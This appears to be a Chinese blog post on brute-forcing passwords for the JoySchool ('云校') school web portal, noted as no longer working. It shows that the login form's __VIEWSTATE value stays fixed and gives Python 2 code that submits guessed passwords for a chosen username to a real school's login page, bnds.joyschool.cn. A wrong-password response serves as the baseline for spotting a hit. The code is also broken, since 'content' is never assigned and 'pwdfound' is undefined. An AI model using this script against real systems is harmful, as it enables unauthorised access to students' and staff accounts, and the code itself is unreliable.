云校密码爆破#1(已不可使用)
云校网页版在登陆时,发送的POST请求中包括一个隐藏域(__VIEWSTATE),但是多次刷新发现并不会变,一直是 %2FwEPDwUJOTg3MjgxNTE0D2QWBmYPZBYCAgIPZBYCZg8WAh4EVGV4dAUp5Y2B5LiA5a2m5qCh5pWw5a2X5LqR5bmz5Y%2BwLS3nlKjmiLfnmbvlvZVkAgEPZBYCZg8PFgIeCEltYWdlVXJsBTlodHRwOi8vc3RhdGljLmpveXNjaG9vbC5jbi9Db250ZW50L2ltYWdlcy9sb2dvLXNjaG9vbC5wbmdkZAICDxYCHwAFPeWMl%2BS6rOW4guacnemYs%2BWMuuacm%2BS6rFNPSE8g5aGUMSBC5Yy6MjEwOeWupCDpgq7nvJbvvJoxMDAwMjBkZF6BcK3tRyh%2B6XhdWd0vo9N8vIN3
因此可以简单实现密码爆破,对比发送错误密码时返回的页面和测试的密码就行了。
python代码,以十一学校为例:
url = "http://bnds.joyschool.cn/Portal/LayoutD/Login.aspx"
postdata = ("__VIEWSTATE=%2FwEPDwUJOTg3MjgxNTE0D2QWBmYPZBYCAgIPZBYCZg8WAh4EVGV4dAUp5Y2B5LiA5a2m5qCh5pWw5a2X5LqR5bmz5Y%2BwLS3nlKjmiLfnmbvlvZVkAgEPZBYCZg8PFgIeCEltYWdlVXJsBTlodHRwOi8vc3RhdGljLmpveXNjaG9vbC5jbi9Db250ZW50L2ltYWdlcy9sb2dvLXNjaG9vbC5wbmdkZAICDxYCHwAFPeWMl%2BS6rOW4guacnemYs%2BWMuuacm%2BS6rFNPSE8g5aGUMSBC5Yy6MjEwOeWupCDpgq7nvJbvvJoxMDAwMjBkZF6BcK3tRyh%2B6XhdWd0vo9N8vIN3&txtUserName=" + username + "&txtUserPwd=123456")
request = urllib2.Request(url, data = postdata)
response = urllib2.urlopen(request)
pwd = "{测试密码}"
postdata = ("__VIEWSTATE=%2FwEPDwUJOTg3MjgxNTE0D2QWBmYPZBYCAgIPZBYCZg8WAh4EVGV4dAUp5Y2B5LiA5a2m5qCh5pWw5a2X5LqR5bmz5Y%2BwLS3nlKjmiLfnmbvlvZVkAgEPZBYCZg8PFgIeCEltYWdlVXJsBTlodHRwOi8vc3RhdGljLmpveXNjaG9vbC5jbi9Db250ZW50L2ltYWdlcy9sb2dvLXNjaG9vbC5wbmdkZAICDxYCHwAFPeWMl%2BS6rOW4guacnemYs%2BWMuuacm%2BS6rFNPSE8g5aGUMSBC5Yy6MjEwOeWupCDpgq7nvJbvvJoxMDAwMjBkZF6BcK3tRyh%2B6XhdWd0vo9N8vIN3&txtUserName=" + username + "&txtUserPwd=" + pwd)
request = urllib2.Request(url, data = postdata)
response = urllib2.urlopen(request)
content2 = response.read()
if pwdfound == "false":
print " [*]testing password " + pwd
if content2 <> content:
print " [*]Password found!"
print " [*]Password:" + pwd